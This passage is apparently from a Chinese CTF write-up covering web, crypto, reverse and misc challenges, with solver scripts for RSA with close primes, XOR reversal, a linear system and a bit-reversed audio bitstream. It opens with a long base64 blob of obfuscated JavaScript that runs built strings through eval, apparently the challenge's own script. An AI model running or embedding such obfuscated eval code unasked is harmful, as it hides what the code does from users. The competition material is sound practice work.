ZldXNTQnLCdXN0dneUNveldPN2NOZ212ZVdTJywnVzQvY0pTb2JEMDlTRldOZFBmYkRrVycsJ0VhUmNMYScsJ2tIUmRSU2t2b3EnLCdnMUpjVXRGY01idmhxU2srRjhvWVc3T1VXN1JjU2Y5M1dPanB0Q2tFcmJwY053SmNJSU5jSUNrUkRta3VXUHBjT0dUV2s4bzdXN1BIVzY3Y1ZTb3ZtOG91V09lL2MzQmNRdlpjUkpLaFc1WHNDOGtPeDJOZFYzTGFXNzdjVEhOZFMwQmRTaEZkS3FKY01tb0RXUWZxV095K2pjbVhXN2YremVkZE5Tb2ZtY3VUQ21vQVc3ZGRJdnlmVzUvY0plV2FXUHo4YThrY1dPcGRMZzRsRmZkY1VKeGNKYVZjUENvVm5tay9XNU9ackNrb1dSN2NLWGhjTjhrVHl1bGRRMGhjSm1vSmFhRmNUbWtrbldkZE04b0NXUjF2VzdOZEhMOUFXUmxkVGdCZElNeVp4dGE3VzZoY1NybllXNzQ2VzUwc1c1VDNXNlpkUENvSFdRM2NJSGRjVHdOY1B0aGNUQ2tVV1JUcmVDb25GdWRjVkNvVVdPeklzYUZjVHhlQlc0eGRWd3Z3VzRuMldQOFdtU2twV1A0b3hjbGNNZmZmVzRicGlXM2RVeHRjVlNvK1c3SmRWU29WV1EvZEhTb3p0YWZxb21rcVdPUGp0U283V1FlMHgzUmROTUJkVk5sZE5ta1h3TG51VzZOY0szcklXN1RFV1JIMkU4bzBXUGhkTkNrK1c2RmRPU2tJejhrTlc2Ymh0U280c2FsY1VnNXdXT3RkUjhvdFc3bWZvaDNjUlduTVdST0lrU29xdUNvbmlmN2RUU2s3dkNvRG1kUmNSbWtQV1BWY1Q4azZXUHhjTmFhVVdQMFBFYk9tcUNvVFdQWmNTbW9XV1E1Tlc2dUdwbWtXd1dpbldPUmNLbWtRV080U1dSL2RRdFczVzdiMFc0SmRUQ2tDV1AwcnRNaGNWaFZjT2cwZFdSTmRQSi9kUUNrcVc2aGRQQ2tFQ21vcVc0L2RTMEpkT1lOZFZtb2ZXT3lQVzRWY0k4b0FXNkcrV085UmxTazdXNUJjU1NvV3dDb0lmU2tHYThvWldPL2RTU290V1BDZVc2blFXUGEwcDB4Y1Bta3hXNFdjV1BUbG1mUmNQc1NmV1BaY0pIWFJmckM3VzVSY1E4by9XNXlCVzU5V3ZHT3BrbW9YV1Juc1dQZjNXN1pjSDhrR2c4b2lqbW9jV1B5VFc2eWlXNnJBV09TQ21hUmNObWt3VzYwUFc1ekNXNXhkVXhwZFFta2dzOGtKdlhiZ1c3ekxCQ2svQnR6WFc3cGNJQ2s3V1J0Y0tDb1N1dHRjUmJwY1FHUmNOME5jSXJXcmU4b255bWthaXdKZElXOXRySUZjVG1rOERNOFdxbWttRENrUFc0TmRJMTNjTXRxMmhTa1FoMmkwQnNkY0pJWmNSU2tGaUp0Y1FTa0h1OGtGeThrNnlzL2RHZi9kUFNrcXJkM2NNdXlCcThvdW1tazlXUHRjUVNveFdRZGRWR2FMRlNrTlc0ODhCdnhkTzhvNXNldGROcVpjSG1vUW1Ta21kZDFiVzQ5dmdXZnFoWHBjUThrWFc0eGNTY3ZYVzVqcmN0dGRMSDNkS05YOGRxbGNWZ3RjVkxKZFBTa2dETlBVRHZ1c1dSdGNUaDhqcHFTM2htaytXNzNkUW1rZ3k4a1VXUXhkS1NrcldReGNVTS9jVThvMHRta1dpdzQ1VzYzY1EyL2RSU2tJb21vZ1c0bGNHQ2s4eENrNmFDa3V6U2tOV1JkY0tmcW5pQ28zV1I0S1dPcGNSd2o0V08zY1BTb2lwQ2tnaW1vRGhZem9XT2F3ZDhvZVc0aGNVOG95ZUpieGdZWmNKOG9RQ3E0ZVdRbGNMdnE4V1FwZFRTb0NXNnhkSEdyZHhjWmRWbWtYelkzY1ViS3BXUVZjSENrNkZYQmRJbW9ZVzZteVc2RHJXNHphc2FHa1dPbVdXNHlHbzNlMGFMZGRRQ29vRFNvb1dQbGRMWlZjUHU5RkJDb0puOGtVV1AvY0h2VmNMY3RkVFNvZFc3TmRRbW8vV09WY1FzRDVXNHlnemNLNFc3YTJ6bW9xclptUkI4b09XUHBjVENvR3hDa3lXT1ZjS1hkZFNzM2NLbWtBV1JoZFNtb0lhOGtub0NvSWNJbGNRQ29UeUNrY1dQbGNMWGhkVVNvN1c1TmRPWHBjTndHY1dQRmNMMEQyQlNvbVdRdGRJOG9oV1BkZFNlL2RTQ281dWZ2R1dSenRXUmlYVzRXbldSM2ROR3orV1JWY1Fta3VtcUxaV1JoZFZJMHdmbW9uVzZWZE1NVzBXNkJkSm1ranRmSDBmMDFRbmViTERDa0loU29raHRaZFJMOHZXNGlIQTF6NnRJTmNQcWZpc2VLcndjWmRVd2RkT3hkZFA4a2RiOG9KQU5WZEttb3plSlZkUzNDWWVtbzRXNEZkTWJwZE9ZVFlXNXZtb0NvWVc2cVFXN1c4VzRKY1A4b3pXUW1ybThvdldRdGRKdThWdUNrMWpncGNKOGsxVzZCZEl0M2NKQ29rZ2ZaY1N3aGRRQ2tBZ0tOZEg4azFEOG93V1JCZEpxVmNVWDk4eThrUFdQN2NSU2tJRjhrNlc1ZWJXUnRjT21vSFdPL2NIU2tYVzRYNlc0T0ZXNUZkTlNrZFdPYjdXNXVHVzR2c2Ftb3dXUUtQVzdaY1Ztb1hkZVZkUzFOZEczdGNOWk5jVDhvc1dRcGRPOGtxRHJaY0l1aWpXNFJjTm1rSldSN2RWQ29jVzVWY1VTa3hGU2tBdVNrSldSUmRPbWtiVzcvZEw4b0pXUFJjSGNWY1BDb0hXNjhzeU1WY0c4azBBTm1FV09OY1BaVmNMR210cm1rRUNta0RwOGs0RGE0Zlc0QmRTWGxkVjhrQ2Vta0RlOG9UaXZOZExDbzBDQ29abDhrWUFtbzFXT1REZHhhN1dReGNHMmE1V1E5TEVOU0VXUGhjU1NvQ1c2QmRTSmpGV1FOZEpDa3B3Q2tuRFNvVVdRM2RUU29qVzdSZFBLYjd4WTFyZUNvbVdPeWhqSXhjSm1rZXhtb0RpSUhObkNreW8zdUJXT1pkVENrb1dSQzNidzk2V1A1SndYV1NsbW9acFdwZFBTa3dXN0JkT3M1TGIxTmNMdFZkTkNvY3Y4bzdrcU9oRG1vWFc3L2NVSUtjaHZMb1dPT0ZlQ283V1BkZEdDb2d1U2tOZjB0Y0t2RmNHU2tlV1J5Z1c3L2NIQ29vV1FCZFZTa2lhOG9FV1JXS1c2R3hXUHJhcXg4NUZJZUNXNWRkVUtQNGRzdGNJYWRkS3Nqclc3VmRHQ2tWVzYvZE5Ta1lXN253Rk10Y09tby9yOGtCVzQzY084b0FXT1pkSk00cVdSSmRWYzljejhrNkJtb2hXNGVBcUdhMWE4b3BXUGRkVHFpSFc1dkZGU2tPczhvQm9Ta0ZXUUxZZWNKY0dDb3lqczErRVNvaXNLSmRVS0ZkSm1ra2RJcGRTU2tkcWUzZE11OE5XNGhjTG1veVc2ak5XUXBjTjNsY0hLWmRKU2t5V1JlZldPdGNPS2pmRG1reFdPQmRITmpaV1I1NldQSEVXUmRjVHR1dVc1OTVXNjBtbHN0Y0t3cldibW8xVzZTeWQwQmRVY0QvV1FCY09Db2F1bWtLVzZyb1dSenhXNE9uVzZxakVTb2dXNlJkSWJkZElncjZsbWtZc0NrZ2tiUzJ5ZEZkT1NrUmdJQmNRbW8zV09SZEtOL2NRU29QYXZ4Y0gwN2RNbWtVV09GY0k4b2RjbWtEcHJISldQRDlGYjV4YUNrUWc4a1RvdXBkVXJEaFdQTDdiU29DV1I0OFdReGRQOGtDdVluQ244a2JXUG0wV1F1bEQyRmRJaC9jS3dXcXNlcW1XNkRkVzRoZFFTbzZXUkJkTU1HN213L2RTOG90V09CY01ta0FXUVR4VzZPWnZ2ZGNNMnZVQVNvSHFDa1pXNC9kUzFqRFdRNGxXN1Q5VzdUa1dRcGNLU29xQTEvY1U4b0dBbW9jQmZSY1VxSmRNQ2twV1FwZFNDb0pXUmlKVzRYd1dSbGNHOG9TQkNvQldPWmRLd0JjS21vM0M4b0dXUC9jTVNvMVdQTmRRU29hVzVhV1c3RmNJU2tVZmM4YVdQN2NJOG80Vzc3Y1NDb1hzOGtic21vVFc3ZkxXUFpkVmZmSkVkZGRVd1ZkSlNrQVc3QmRQY0ZkUk1QTFdSQmRPOG9kV1B6Q1dRUDhXUEJjVm1vMldPbUVvbWtNVzZxRFc3NVZXNTdjUjhrRVdPL2RIU29HV1B5aGxtbzdiU2szVzZxL211akdXUEJkT21rRFc1L2RVbW9JZGU5L2ptb1prMlJkUk5tcFdPcWxXT2Fod21vbmtTb2ZXNjh2RnRCY0lDazdCU2tadXJSY1VTb1BoYnpPY2ZkZE5Tb0ZlYVdpV1Ftd1c1TFVXN0pkS2JPTVdSZGNPU29zVzVYY1c0MEpXNEcyZ21vS0Q4b09XUDNjR1NvMXFDa0lXUmRkTHZqeVc0ZGNKbW9YV1FSZEdTa3prOG9lb21rS2pTa3R2TDdkUFlDVFdSTHZXUUpkVThrVG5aRzRFTVhPQzBqZkJjZnhrQ29mVzZ2eldPN2NVbWt6V1FSY1Jta3lXN0RHV1J4ZFBta1lXUU5jRzhrK3QxdGNUTGxkS0NvTVdQWmRWOGs5dmQzZEdTa0ZyOGtEdzhrR1c0RmROOGt0cjNKY1FhSmRMQ29oaUd5Y1c1T05BOGtGJywneXd4Y09Ta0VXNmknLCdXUTNjVG1rVHJta2YnLCd4SXhkUXFlRycsJ3V0dURXN2hkSFNrWFdQV2UnLCdXUHBkSGEnLCdmcm52V09mOGxIRmRKbWtxVzViM1c3QycsJ1dSdVonLCdXT1JjTkNrNnNTa01XNWZOZlcnLCdsQ29kJywnZkkwaWJXMDVxRycsJ0F3NCcsJ3A4bzZXUFM4VzdLJywnV1FOY1M4bzV6U29nV09wZE1Da2JXUXVXYW1veScsJ2JoTmRMZlBjekNrTFc0ekNDU2tqeEcnLCdXNmJSY2d4Y0dHM2RUbWtWcVNvV0JXJywndXNLJywndXhQbHVMNHN1U29TbTJ0Y0txJywnZ3J5JywnVzVCZE1Tb2JlbW8vV1BlSXdDbzVXNlgzRWEnLCdGTlJkR3FwY1I4azJvbW9ZV1JOY0dKcUInLCdxU2tUJywnYmZ0Y09XQmROYmJocm1rU3lXJywneExlblc1YTgnLCdqWWEnLCdqY2xkTENvSUYzaTZBcScsJ3A4b20nLCdFbW92a3IvZE1hdTBlYScsJ2xIbGRQU2tFbWEnLCdXT3hjUzhrRldPbGRSWFZkUm1vYicsJ0IwSmNPSVQvJ107XzB4MmE4Mz1mdW5jdGlvbigpe3JldHVybiBfMHhlYjg5NDc7fTtyZXR1cm4gXzB4MmE4MygpO31mdW5jdGlvbiBfMHgzNmY3ZDcoKXt2YXIgXzB4M2VmOGI2PV8weDRkNDUsXzB4MmIzOTBiPShmdW5jdGlvbigpe2lmKCd0VWVHdichPT0ndFVlR3YnKXJldHVybiBfMHgzZWFkMmEoXzB4MTBkODY0KTtlbHNle3ZhciBfMHhjNTJlODM9ISFbXTtyZXR1cm4gZnVuY3Rpb24oXzB4MjVkMDYzLF8weDE0YjBhZil7dmFyIF8weDE5YjU2YT1fMHg0ZDQ1O2lmKCdtSFhPeCc9PT1fMHgxOWI1NmEoMHgyMjUsJ0FkQUYnKSlfMHgzNGQ5M2QoXzB4MmQwMWFkKSgpO2Vsc2V7dmFyIF8weDQzNWU0Mz1fMHhjNTJlODM/ZnVuY3Rpb24oKXtpZihfMHgxNGIwYWYpe3ZhciBfMHgyNzhjOWU9XzB4MTRiMGFmWydhcHBseSddKF8weDI1ZDA2Myxhcmd1bWVudHMpO3JldHVybiBfMHgxNGIwYWY9bnVsbCxfMHgyNzhjOWU7fX06ZnVuY3Rpb24oKXt9O3JldHVybiBfMHhjNTJlODM9IVtdLF8weDQzNWU0Mzt9fTt9fSgpKSxfMHgxMjYwMGM9XzB4MmIzOTBiKHRoaXMsZnVuY3Rpb24oKXt2YXIgXzB4NDZiYmY5PV8weDRkNDU7cmV0dXJuIF8weDEyNjAwY1tfMHg0NmJiZjkoMHgyMTEsJ0RHbHQnKV0oKVsnc2VhcmNoJ10oXzB4NDZiYmY5KDB4MjFjLCdER2x0JykpW18weDQ2YmJmOSgweDIwMSwnW1NwdicpXSgpW18weDQ2YmJmOSgweDFmYiwnJmhlXicpXShfMHgxMjYwMGMpWydzZWFyY2gnXSgnKCgoLispKykrKSskJyk7fSk7cmV0dXJuIF8weDEyNjAwYygpLF8weDNlZjhiNigweDIwOSwnWFNETycpK18weDNlZjhiNigweDIxMCwnQkRaVScpK18weDNlZjhiNigweDFmNCwnRHlMRycpK18weDNlZjhiNigweDIyOSwnaGdbQCcpK18weDNlZjhiNigweDIwMiwnWFNETycpK18weDNlZjhiNigweDIyMywnbXBHaScpK18weDNlZjhiNigweDFmNSwnSkFqeScpK18weDNlZjhiNigweDIxOSwnVThOWycpK18weDNlZjhiNigweDFmMiwnVHR4VCcpK18weDNlZjhiNigweDFmNiwnd0E4dCcpK18weDNlZjhiNigweDIwNSwnZSl2TCcpK18weDNlZjhiNigweDIxNCwnZUZVOScpK18weDNlZjhiNigweDIxZiwnWFNETycpO312YXIgXzB4NGQwMzJkPWV2YWwoXzB4MzZmN2Q3KClbJ3NwbGl0J10oXzB4NDJkNjUzKDB4MjEyLCdUdHhUJykpWzB4ZjZhKzB4MTJiOSoweDErLTB4MjIyMV0pLF8weDRkM2ZiND1ldmFsKF8weDM2ZjdkNygpWydzcGxpdCddKF8weDQyZDY1MygweDFmZCwnXnNdMCcpKVstMHgyZDkqLTB4OSstMHgyNSoweDZmKy0weDk5M10pLF8weDI4MGJiZj1ldmFsKF8weDM2ZjdkNygpW18weDQyZDY1MygweDIyMCwnQGwqZCcpXShfMHg0MmQ2NTMoMHgyMWUsJ2VFJiQnKSlbMHgyMmIxKy0weDJlKjB4NTIrLTB4MTNmMV0pLF8weDNlZGUxNj1ldmFsKF8weDM2ZjdkNygpW18weDQyZDY1MygweDFmOCwnZiUoaCcpXShfMHg0MmQ2NTMoMHgyMjEsJ0FkQUYnKSlbMHgxZCotMHhkZisweDIqMHhmY2QrLTB4MSoweDY1Ml0pLF8weDEzYTE1NT1ldmFsKF8weDM2ZjdkNygpW18weDQyZDY1MygweDIyNywnbyUkTCcpXShfMHg0MmQ2NTMoMHgyMWIsJzFNYzAnKSlbMHhjMmIqMHgzKy0weDMqLTB4OWMxKy0weDQxYmVdKTsoZnVuY3Rpb24oXzB4NWRhMTViKXtyZXR1cm4gXzB4NWRhMTViKF8weDVkYTE1Yik7fShmdW5jdGlvbihfMHhjNGJlOGQpe3JldHVybiBmdW5jdGlvbihfMHgzYTMxNzYpe3ZhciBfMHg1MTI1MWE9XzB4NGQ0NTtmb3IodmFyIF8weDc5MzZkMD0weDIzMWErMHhlMmYrLTB4MzE0OTtfMHg3OTM2ZDA8MHgxZDAxKzB4MioweDIwKy0weDMzNSoweDk7XzB4NzkzNmQwKyspe2lmKF8weDUxMjUxYSgweDIxNSwnRFVjKScpPT09XzB4NTEyNTFhKDB4MjBiLCdER2x0Jykpe2Zvcih2YXIgXzB4NDE5ODRlPTB4YzgqLTB4MistMHgyMTU3KzB4MjJlNztfMHg0MTk4NGU8LTB4ZjFlKzB4MSoweDFmOWIrLTB4MTAxOTtfMHg0MTk4NGUrKyl7dmFyIF8weDU2ZTBiMD0hW10sXzB4OWU3NTk1PV8weDc2MmMyOCgpW18weDUxMjUxYSgweDIwYSwnSUNCWicpXShfMHg1MTI1MWEoMHgyMTQsJ2VGVTknKSlbMHgxODE4KzB4ZioweDI4NCstMHgxNDljKjB4M10sXzB4Mjc3M2ZlPSgtMHgxYzU1Ky0weDNhKjB4YWErMHg0MzE1KSpfMHg0MTk4NGUvKDB4MSoweGMwNystMHhkKi0weDJkZCstMHgzYioweGQ0KSxfMHgxYjk5ZjE9LTB4MSoweGU3YisweDEyMGQrLTB4N2EqMHg3LSgweDFkYzUqMHgxKzB4MWEzNSotMHgxKy0weGMqMHg0NykqXzB4NDE5ODRlLygtMHgxOTQwKjB4MSsweDI1MzUrLTB4YjkxKTtfMHgxNWE4Y2IoKT49LTB4NyoweDQxKzB4MjY1NyotMHgxKzB4MjgxZSswLjk5OTkmJihfMHg5ZTc1OTU9XzB4YzE2YzE2KClbXzB4NTEyNTFhKDB4MjBjLCdVOE5bJyldKF8weDUxMjUxYSgweDIyYSwnW1NwdicpKVstMHg4MDUrMHgyMDYqMHgxKzB4NjAwXSxfMHg1NmUwYjA9ISFbXSk7XzB4MTU3MTViKF8weDUxMjUxYSgweDIwNywnc0N2TCcpLF8weDllNzU5NVtfMHg1MTI1MWEoMHgyMTMsJ0RocyonKV0oL1x7YVx9L2dtLF8weDI3NzNmZStfMHg1MTI1MWEoMHgxZmUsJ0BsKmQnKSlbJ3JlcGxhY2UnXSgvXHtiXH0vZ20sXzB4MWI5OWYxK18weDUxMjUxYSgweDFmZSwnQGwqZCcpKSk7aWYoXzB4NTZlMGIwKV8weDIwZmRlOCgpO31fMHgzNTQ2OTgoZnVuY3Rpb24oKXtfMHg1ZjRhZDIoXzB4MzFhYzZkKSgpO30sLTB4MjJiOCstMHgzKjB4N2Q5KzB4YzBiKjB4NSksXzB4MzU1YWY4KF8weGNmM2RhYSwweDFjMTArMHg1MDUrLTB4MWY1Myk7fWVsc2V7dmFyIF8weDM4ZDk2MT0hW10sXzB4NDhiOGFhPV8weDM2ZjdkNygpWydzcGxpdCddKF8weDUxMjUxYSgweDIwZSwndChLeCcpKVsweDFhZTIrLTB4N2E5Ky0weDEzMzldLF8weDQ4YTRhYT0oLTB4MjI3YSoweDErMHg3YyoweDFhKzB4MTYxZSkqXzB4NzkzNmQwLygtMHgzKjB4YThkKzB4MjI3NSstMHgyNmEpLF8weDU0ODcwZD0weDIzZmYrMHgxKjB4MTBjZistMHgzNDkyLSgweDE2NjMrLTB4MmEzKi0weDMrLTB4MWUxMCkqXzB4NzkzNmQwLygweDcqLTB4MmYyKy0weDFjYjUrMHgzMWI3KTtfMHgyODBiYmYoKT49LTB4MiotMHg3YWMrLTB4N2QqMHgxMystMHg2MTErMC45OTk5JiYoXzB4NDhiOGFhPV8weDM2ZjdkNygpW18weDUxMjUxYSgweDIyOCwneEBiSicpXShfMHg1MTI1MWEoMHgxZWYsJ0prYm4nKSlbMHhmMzErMHgyNGQqLTB4MTArLTB4NTY4Ki0weDRdLF8weDM4ZDk2MT0hIVtdKTtfMHg0ZDAzMmQoXzB4NTEyNTFhKDB4MWYzLCdmJShoJyksXzB4NDhiOGFhWydyZXBsYWNlJ10oL1x7YVx9L2dtLF8weDQ4YTRhYStfMHg1MTI1MWEoMHgxZmUsJ0BsKmQnKSlbXzB4NTEyNTFhKDB4MWZhLCcxTWMwJyldKC9ce2JcfS9nbSxfMHg1NDg3MGQrXzB4NTEyNTFhKDB4MWZlLCdAbCpkJykpKTtpZihfMHgzOGQ5NjEpXzB4NGQzZmI0KCk7fX1fMHgxM2ExNTUoZnVuY3Rpb24oKXt2YXIgXzB4NGQ5YjMxPV8weDUxMjUxYTtpZihfMHg0ZDliMzEoMHgyMDgsJ0FkQUYnKSE9PSdxRmpHaCcpe3ZhciBfMHg0MzI4MDc9XzB4MTI0NTQ2P2Z1bmN0aW9uKCl7dmFyIF8weDUzZGI0Nj1fMHg0ZDliMzE7aWYoXzB4NGJhNDY3KXt2YXIgXzB4MWQwOTJlPV8weGFhODNkZFtfMHg1M2RiNDYoMHgyMDQsJzVlRU0nKV0oXzB4MTMyMTBjLGFyZ3VtZW50cyk7cmV0dXJuIF8weDU2ODE2YT1udWxsLF8weDFkMDkyZTt9fTpmdW5jdGlvbigpe307cmV0dXJuIF8weDNlNzM1Nz0hW10sXzB4NDMyODA3O31lbHNlIF8weGM0YmU4ZChfMHhjNGJlOGQpKCk7fSwtMHgxKjB4MjBjMystMHhjKi0weDEzNystMHg1Ki0weDQwNyksXzB4MTNhMTU1KF8weDRkM2ZiNCwweDIzNTEqLTB4MSstMHg3YiotMHgzKzB4MjNhMik7fTt9KSgpKTs"))

反混淆网站https://dev-coco.github.io/Online-Tools/JavaScript-Deobfuscator.html
好了到了不擅长的地方了，还得向大佬们学习

除了官方wp，还看了两位大佬的wp
https://c1oudfl0w0.github.io/blog/2024/04/24/第九届中国海洋大学信息安全竞赛
晨曦爷
https://chenxi9981.github.io/中国海洋大学信息安全竞赛/

Crypto

Base64*rot13

MzkuM3gyrzI6Z3cyrzHlMKcSra0=
https://cyberchef.org/
杂项题，听说是他们Web手出的，所以AK没难度，为数不多的能AK的了

NeXT RSA

p,q相近，开平方爆破

from Crypto.Util.number import *
import gmpy2

n = 80044118049755180996754407858488943779355738585718372337839486032339412481191013051614126608584578841408197524632831442032118319629160505851518198448787590483634506563248531254421862061651099856312546562506221294620627871718678484548245902274972044599314097339549053518589561289734819710218838311181044519738709148493164321955860982700783886286661558574861608455547990794798848491695189544811325833194530596317989718866319530140199263278168146224240677087191093183415595617994125075880280632369616506148501757653260154487000183157405531772172082897743929126980157956142627803176227942226654177011633301413616266656761
c = 23280133104463252598665779150831148192014617461904564929071121215373331248942762386170411274023248423328388793808975632652896384007449549469345318875514363621903138122407682293848670093433946555776164835208375667498606187869211466397624286383057425296636315379314349307816391315242971306898487494604324473266965665471735612154916305882443496151118031672777088597821127499085632141307413890900246444539517971766135909771880642211582699957211983212981047822362311969553832913399476190919026666192056319334425636757404603336130688707109219644178606626422717046059209499394056295682594928581470210114322505904198054215544
e = 65537


def factor(n):
    a, f = gmpy2.iroot(n, 2)

    while (True):
        a += 1
        try:
            b, f = gmpy2.iroot(a*a - n, 2)
        except:
            pass

        if f:  
            return a-b, a+b


p = factor(n)[0]
q = factor(n)[1]
phi = (p-1)*(q-1)
d = inverse(e, phi)
print(long_to_bytes(pow(c, d, n)))

模！

转二进制，每八位为一个字符，注意第一个字符只有7位，最前面补个0即可

from math import factorial
from functools import reduce

flag = "flag{}"

def mooooo(s: str):
    res = 0
    for i in s:
        res <<= 8
        res += (factorial(ord(i)) % 233)
    return res

table = "abcdefghijklmnopqrstuvwxyz{}"
assert (reduce(lambda p, i: (i in table)*p, flag, True))
# output: 2508450541438803643416583335895451914701844680466330955847
a = 2508450541438803643416583335895451914701844680466330955847
# print(bin(a)[2:])
b = '011001100100110101110010000101011000110000011110011100100100110101110010000001000001111001110010010011010111001000000100010101110111001000000100010011010011000001010111011100100011000001000111'
flag = ''
for i in range(0, len(b), 8):
    f = b[i:i+8]
    for j in table:
        if factorial(ord(j)) % 233 == int(f, 2):
            flag += j
print(flag)

Reverse

xor++

拖入IDA分析异或程序即可

v4 = [ord('%'), ord('('), ord('$'), ord('!'), ord('<'), ord('*'), ord('<'), 30, 20, 40, 36, 40, 41, 97, 50, 39, 63, 32, 12, 9, 32, 104,
      55, 46, 4, 63, 53, 106, 17, 7, 4, 61, 14, 17, 38, 14, 26]
for i in range(len(v4)):
    print(chr(v4[i] ^ (67+i)), end='')

Misc

一眼盯帧

手动拿到30+张图，解方程
在出题人wp里被拷打了，我们要学会用工具批量提取目标帧，然后逐张OCR转换成文本QWQ

import sympy

a1 = sympy.Symbol('a1')
...
a31 = sympy.Symbol('a31')
f1 = 40*a1+42*a2+69*a3+91*a4+91*a5+74*a6+45*a7+49*a8+99*a9+41*a10+79*a11+26*a12+51*a13+74*a14+84*a15+31*a16 + \
    74*a17+11*a18+87*a19+76*a20+26*a21+40*a22+13*a23+31*a24 + \
    39*a25+7*a26+84*a27+65*a28+25*a29+88*a30+13*a31-159700
...
f36 = 81*a1 + 69*a2 + 66*a3 + 57*a4 + 58*a5 + 72*a6 + 8*a7 + 61*a8 + 5*a9 + 73*a10 + 35*a11 + 57*a12 + 67*a13 + 77*a14 + 35*a15 + 7*a16 + \
    91*a17 + 83*a18 + 4*a19 + 92*a20 + 39*a21 + 84*a22 + 47*a23 + 60*a24 + \
    35*a25 + 59*a26 + 74*a27 + 42*a28 + 51*a29 + 93*a30 + 20*a31 - 164152

result = sympy.solve([
                     f1, f2, f3, f4, f5, f6, f7, f8, f9, f10, f11, f12, f13, f14, f15, f16, f17, f18, f19, f20, f21, f22, f23, f24, f25, f26, f27, f28, f29, f30, f31, f32, f33, f34, f35, f36], [a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11, a12, a13, a14, a15, a16, a17, a18, a19, a20, a21, a22, a23, a24, a25, a26, a27, a28, a29, a30, a31])
# print(result)
dictionary = {
    'a1': 102, 'a2': 108, 'a3': 97, 'a4': 103, 'a5': 123, 'a6': 108, 'a7': 48, 'a8': 110, 'a9': 103, 'a10': 95, 'a11': 49, 'a12': 105, 'a13': 118, 'a14': 51,
    'a15': 95, 'a16': 116, 'a17': 72, 'a18': 101, 'a19': 95,
    'a20': 108, 'a21': 105, 'a22': 84, 'a23': 52, 'a24': 110, 'a25': 103,
    'a26': 95, 'a27': 107, 'a28': 105, 'a29': 78,  'a30': 103,
    'a31': 125
}

for key, value in dictionary.items():
    print(chr(value), end='')

帕鲁服务器#1

根据附件创建新的虚拟机
https://blog.csdn.net/qianbihua00/article/details/117076093
启动虚拟机，然后用wireshark进行抓包，抓的是虚拟机的流量

是流量分析，只是不给流量包你了而已，自己抓包总会吧

过去的CD

下载ultraiso，提取CD里面的音频出来
https://blog.csdn.net/COCO56/article/details/106961183
查看频谱图

手动提取出来

01100110001101101000011011100110110111100100011010100110110011000000111011111010010001101111011000001100000011101111101001000110110011001010011000001110101111100101000011
好像一般的工具解不了，结合hint的UART，emmm发现没什么用好像，知道校验位
正常的flag头01100110 01101100 01100001 01100111 01111011
这里的flag头01100110 00110110 10000110 11100110 11011110
好了，发现是依次逆字节输出

s = '01100110001101101000011011100110110111100100011010100110110011000000111011111010010001101111011000001100000011101111101001000110110011001010011000001110101111100101000011'
bin = ''
for i in range(0, len(s), 8):
    t = s[i:i+8]
    bin += t[::-1]
print(bin)

二进制转ASCII得到flag{be3p_bo0p_b3ep}